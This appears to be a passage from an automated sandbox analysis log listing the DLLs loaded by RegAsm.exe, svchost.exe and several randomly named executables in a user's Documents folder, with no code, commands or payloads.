Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: umpdc.dll
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Section loaded: pdh.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: mozglue.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: wsock32.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
